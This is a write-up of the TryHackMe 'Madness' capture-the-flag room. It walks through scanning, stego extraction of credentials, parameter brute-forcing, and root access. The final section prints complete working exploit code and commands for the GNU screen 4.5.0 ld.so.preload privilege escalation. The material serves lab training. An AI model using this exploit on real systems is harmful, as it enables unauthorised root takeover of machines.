Having fun with TryHackMe again, so here is the write-up and guide for passing the Madness challenge.

Room: https://tryhackme.com/room/madness
Level: Easy

Task: Use your skills to access the user and root account!

As usual, open the IP in the browser and run nmap against it as well:

# nmap -T4 -A -sV 10.10.196.75
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ac:f9:85:10:52:65:6e:17:f5:1c:34:e7:d8:64:67:b1 (RSA)
| 256 dd:8e:5a:ec:b1:95:cd:dc:4d:01:b3:fe:5f:4e:12:c1 (ECDSA)
|_ 256 e9:ed:e3:eb:58:77:3b:00:5e:3a:f5:24:d8:58:34:8e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Two ports are open: SSH and HTTP. Nothing to do with SSH yet; we can come back to it. So, on to the web page. There is no suspicious string on the page except the dead image link at the top, so let's look at the source.

There is a hint in the source that might be related to the dead link, so let's download it:

# wget http://10.10.X.X/thm.jpg
# cat thm.jpg
PNG
...

It's the wrong format. I tried renaming it, but that didn't work. After searching for a solution for quite some time, I found that the problem is in the file header. I'm referring to this page to fix the header: https://www.file-recovery.com/jpg-signature-format.htm

# hexeditor thm.jpg

The file is named .jpg but starts with the PNG magic (89 50 4E 47 0D 0A 1A 0A), which is why nothing will open it. A real JPEG always begins with the SOI marker FF D8 FF, and a JFIF file continues with FF E0 00 10 4A 46 49 46 00 ("JFIF\0"). Overwrite the first line of the hex dump with that JPEG signature and save.
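The same repair can be done programmatically instead of by hand in hexeditor. The block below is an added example (my own, not the write-up's or the room's): it identifies a file by its magic bytes rather than its extension and, on the assumption that only the first 8 bytes were overwritten with the PNG magic while the rest of the JFIF header is intact (hypothetical, inferred from the write-up), restores the JFIF prefix. The tampered sample is constructed inline; the file names in the usage section are placeholders.

```python
# Well-known file signatures (magic bytes); these are fixed by the formats themselves.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"                  # 8 bytes
JPEG_SOI = b"\xff\xd8\xff"                         # Start Of Image marker, every JPEG begins with it
JFIF_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"  # SOI + APP0 marker, length 16, "JFIF\0" (11 bytes)

# Constructed sample (not the real thm.jpg): a JFIF header whose first 8 bytes were
# replaced with the PNG magic, followed by the APP0 version/density/thumbnail fields.
SAMPLE_TAMPERED = PNG_MAGIC + JFIF_HEADER[8:] + b"\x01\x01\x00\x00\x01\x00\x01\x00\x00"


def identify(data: bytes) -> str:
    """Classify a blob by its leading bytes, ignoring whatever extension it carries."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(JPEG_SOI):
        return "jpeg"
    return "unknown"


def repair_jfif_header(data: bytes) -> bytes:
    """Put the JFIF prefix back over the first 8 bytes.

    Assumption (hypothetical, matching what the write-up describes): only the first
    8 bytes were clobbered, so the tail "IF\\x00" of the "JFIF\\x00" identifier is
    still at offset 8. Anything else is refused so a genuine PNG is not corrupted.
    """
    if identify(data) == "jpeg":
        return data  # nothing to fix
    if len(data) < 11 or data[8:11] != b"IF\x00":
        raise ValueError("tail does not look like a JFIF APP0 segment; not patching")
    return JFIF_HEADER[:8] + data[8:]


if __name__ == "__main__":
    import sys

    # usage: python3 fixjpg.py thm.jpg thm.fixed.jpg  (names are placeholders)
    src, dst = sys.argv[1], sys.argv[2]
    with open(src, "rb") as f:
        blob = f.read()
    print(f"{src}: looks like {identify(blob)}")
    with open(dst, "wb") as f:
        f.write(repair_jfif_header(blob))
    print(f"wrote {dst}: now looks like {identify(repair_jfif_header(blob))}")
```

The check on offset 8 is the important part: if the bytes after the overwritten prefix do not look like JFIF, the file was not a JPEG to begin with and patching a signature onto it only hides that.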

Opened as a proper JPEG, the image shows a hint pointing to a hidden directory. Let's open it in the browser.

Just a dead end. It says to guess his secret, and the "Secret Entered" text is suspicious: where is the input?

Let's run gobuster first:

# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.196.X/th1s_1s_h1dd3n/ -t 40
..
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
..

Still no luck (the 403s on .htpasswd and .htaccess are just Apache's default deny rules, not a finding). Maybe the page takes a query string? But which parameter name? So I used Arjun to brute-force the parameter names this page responds to:

# arjun -u http://10.10.196.X/th1s_1s_h1dd3n/index.php
[*] Probing the target for stability
[*] Analysing HTTP response for anamolies
[*] Analysing HTTP response for potential parameter names
[*] Logicforcing the URL endpoint
[✓] name: secret, factor: body length

OK, now it makes sense. The hint says the "secret" parameter only takes values in the range 0–99, so let's write a simple Python script to try them all:

import sys
import requests

URL = "http://URL"  # the hidden directory's index.php (placeholder kept from the original)


def main(secret):
    req = requests.get(url=URL, params={"secret": secret})
    print(req.url)
    # every wrong guess answers "That is wrong"; anything else is the hit
    if "That is wrong" not in req.text:
        print(req.text)
        sys.exit(1)


if __name__ == '__main__':
    # the hint says 0-99 inclusive, so 100 candidates (range(0, 99) would skip 99)
    for x in range(0, 100):
        try:
            main(x)
        except KeyboardInterrupt:
            sys.exit(1)

Got the secret: y2RPJ4QaPXXX. But what is it for? I tried decoding it with CyberChef first, with no luck. So which secret is this? I think it is related to the images.

Let's try the madness.jpg image with steghide first, without the secret and then with it:

# steghide extract -sf madness.jpg
Enter passphrase:
wrote extracted data to "password.txt".
# cat password.txt
I didn't think you'd find me! Congratulations!
Here take my password*axA&GFXXX

Wait, what? With an empty passphrase it just hands over the data.

This image actually contains a password. Okay, save it for later; no need to try the secret code (y2RPJ4QaPXXX) on this one.

Let's try the other image (the repaired thm.jpg, the one that looks like binary noise).

# steghide extract -sf ~/Pictures/thm.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!

Without the secret it fails. With y2RPJ4QaPXXX entered as the passphrase:

# steghide extract -sf ~/Pictures/thm.jpg
Enter passphrase:
wrote extracted data to "hidden.txt".
# cat hidden.txt
Fine you found the password!
Here's a usernamewbxXXI didn't say I would make it easy for you!

Now we have a username, probably paired with the password from the madness image. I think these are the SSH credentials, so let's try:

# ssh wbxxx@10.10.X.X
wbxxx@10.10.X.X's password:
Permission denied, please try again.

Permission denied. What happened? The hint says something about "ROT with this name", so the username is ROT-encoded. Decoding it with CyberChef (it turns out to be ROT13: w becomes j) gives the real username:
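To make the ROT step reproducible without CyberChef, here is an added example (mine, not from the original post) that rotates a string through all 25 shifts and filters them by a prefix you already know. The sample input "wbx" is the visible part of the masked username above; the rest of the username is not on the page, and the "Hello, World!" check is a constructed sanity test.

```python
import string
from typing import Dict, List, Tuple

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def rot(text: str, shift: int) -> str:
    """Rotate letters by `shift` positions, preserving case and leaving digits,
    punctuation and whitespace untouched (so ROT on a username keeps its shape)."""
    shift %= 26
    table = str.maketrans(
        LOWER + UPPER,
        LOWER[shift:] + LOWER[:shift] + UPPER[shift:] + UPPER[:shift],
    )
    return text.translate(table)


def all_rotations(text: str) -> Dict[int, str]:
    """Every non-identity shift 1..25; ROT13 is just the entry for 13."""
    return {n: rot(text, n) for n in range(1, 26)}


def candidates_matching(text: str, known_prefix: str) -> List[Tuple[int, str]]:
    """Shifts whose output starts with something you already know about the target
    (for example the prompt it echoed back), for when the hint does not say which ROT."""
    return [(n, s) for n, s in all_rotations(text).items() if s.startswith(known_prefix)]


if __name__ == "__main__":
    # "wbx" is the visible prefix of the masked username from the write-up
    for n, candidate in all_rotations("wbx").items():
        print(f"ROT{n:2d}: {candidate}")
    print("ROT13:", rot("wbx", 13))
```

Running it shows only one shift turns "wb" into "jo", which is why CyberChef's ROT13 recipe is the right one here; the prefix filter is the same idea when you have a partial match instead of an explicit hint.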

# ssh joxxx@10.10.X.X
joxxx@10.10.X.X's password:
joxxx@ubuntu:~$

Success: we have a shell as the user, and the user flag is right there in the home directory. Time for root.

Check whether anything runs from cron (crontab -l lists the user's jobs; -e would open them in an editor):

# crontab -l
# cat /etc/crontab

No luck here. The room description says "This room is part of the Turmoil series", so let's see whether the word turmoil appears anywhere on the server:

# grep -rs "turmoil" /

Also no luck. Let's check the kernel.

# uname -a
Linux ubuntu 4.4.0-170-generic #199-Ubuntu SMP Thu Nov 14 01:45:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

exploitdb has nothing directly usable for this exact kernel build, so let's run Linux Exploit Suggester 2:

jokxx@ubuntu:~$ perl linux-exploit.pl
#############################
Linux Exploit Suggester 2
#############################
Local Kernel: 4.4.0
Searching 72 exploits...
Possible Exploits
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] dirty_cow
CVE-2016-5195
Source: http://www.exploit-db.com/exploits/40616
[3] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[4] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010

I tried all of them, and none work. The suggester only matches on the 4.4.0 version string; an Ubuntu 4.4.0-170 build from November 2019 already carries the fixes for these older CVEs. So I went browsing the file system for anything else that could be done… after four hours:

# ls -al /bin
....
lrwxrwxrwx 1 root root 12 Jan 4 2020 screen -> screen-4.5.0
-rwsr-xr-x 1 root root 1588648 Jan 4 2020 screen-4.5.0
-rwsr-xr-x 1 root root 1588648 Jan 4 2020 screen-4.5.0.old
lrwxrwxrwx 1 root root 12 Jan 4 2020 screen.old -> screen-4.5.0
....

Something interesting: GNU screen has been replaced with a setuid-root screen-4.5.0 (plus a .old copy), which is not how stock Ubuntu ships it. Listing setuid binaries (find with the -perm -4000 test) would have turned this up in seconds rather than hours. Googling that version finds a local root exploit for screen 4.5.0 (CVE-2017-5618, where the -L logfile is opened while still running as root): https://www.exploit-db.com/exploits/41154
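The setuid sweep is the check worth automating. The block below is an added example (my code, not the write-up's or the room's): a Python setuid finder plus a heuristic that flags root-owned setuid files that come with a .old twin, the pattern visible in the listing above. demo() builds a constructed temp-dir fixture so the block runs anywhere; on the target you would point find_setuid at /.

```python
import os
import stat
import tempfile
from typing import List, Tuple

PSEUDO_FS = ("/proc", "/sys", "/dev")  # noise, and walking /proc can hang


def find_setuid(root: str = "/") -> List[Tuple[str, int, str]]:
    """Return (path, owner uid, octal mode) for every regular file under `root`
    with the setuid bit set. Symlinks are not followed (the bit lives on the
    target) and unreadable directories are skipped instead of aborting the walk."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return hits


def suspicious(hits: List[Tuple[str, int, str]], owner: int = 0) -> List[str]:
    """Heuristic: setuid files owned by `owner` (root by default) that either have
    a "<name>.old" twin in the same result set or are that .old copy themselves.
    That is exactly the screen-4.5.0 / screen-4.5.0.old pattern from the listing."""
    names = {os.path.basename(p) for p, _, _ in hits}
    flagged = []
    for path, uid, _ in hits:
        base = os.path.basename(path)
        if uid == owner and (base + ".old" in names or base.endswith(".old")):
            flagged.append(path)
    return sorted(flagged)


def demo() -> Tuple[List[str], List[str]]:
    """Constructed fixture (not the target box): a temp dir with two setuid files
    mimicking the screen binaries and one ordinary file. Returns the base names
    found and the base names flagged."""
    d = tempfile.mkdtemp()
    for name, mode in (("screen-4.5.0", 0o4755), ("screen-4.5.0.old", 0o4755), ("plain", 0o755)):
        p = os.path.join(d, name)
        with open(p, "wb"):
            pass
        os.chmod(p, mode)
    hits = find_setuid(d)
    found = sorted(os.path.basename(p) for p, _, _ in hits)
    # the fixture files are owned by us, so the owner filter uses our uid here
    flagged = [os.path.basename(p) for p in suspicious(hits, owner=os.getuid())]
    return found, flagged


if __name__ == "__main__":
    hits = find_setuid("/")
    for path, uid, mode in hits:
        print(f"{mode} uid={uid} {path}")
    print("suspicious:", suspicious(hits))
```

The .old heuristic is deliberately narrow; the real signal on a box is the full setuid list compared against what the distribution installs, and anything unexpected in it gets looked up by version.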

So, follow the exploit's steps. Create two files: libhax.c, a shared library whose constructor makes /tmp/rootshell setuid root, and rootshell.c, the helper that becomes root.

$ cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>   /* chmod */
#include <unistd.h>     /* chown, unlink */
/* runs automatically when the library is loaded via /etc/ld.so.preload into a root process */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);      /* make the helper root-owned ... */
    chmod("/tmp/rootshell", 04755);     /* ... and setuid root */
    unlink("/etc/ld.so.preload");       /* clean up so every later process is not poisoned */
    printf("[+] done!\n");
}
EOF
$ cat << EOF > /tmp/rootshell.c
#include <stdio.h>
#include <unistd.h>     /* setuid, setgid, seteuid, setegid, execv */
int main(void){
    /* the binary is setuid root by now, so these all succeed */
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    char *argv[] = { "/bin/sh", NULL };
    execv(argv[0], argv);   /* the original called execvp with a stray third argument */
    return 1;
}
EOF

Then compile both and abuse screen's logfile handling. The setuid-root screen 4.5.0 opens the file named by -L with root privileges, so running it from /etc with a permissive umask creates /etc/ld.so.preload containing a newline plus the path of libhax.so. The next screen invocation (screen -ls, again setuid root) loads that library through ld.so.preload, its constructor runs as root and makes /tmp/rootshell setuid root:

# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
# rm -f /tmp/libhax.c
# gcc -o /tmp/rootshell /tmp/rootshell.c
# rm -f /tmp/rootshell.c
# cd /etc
# umask 000
# screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
# screen -ls
# /tmp/rootshell
#

Now we are officially root!

# cat /root/root.txt
THM{5ecd98aa66a6abb670184d7547XXXXX}

Done! It was harder than I expected.

Software Engineer at Teratotech.com
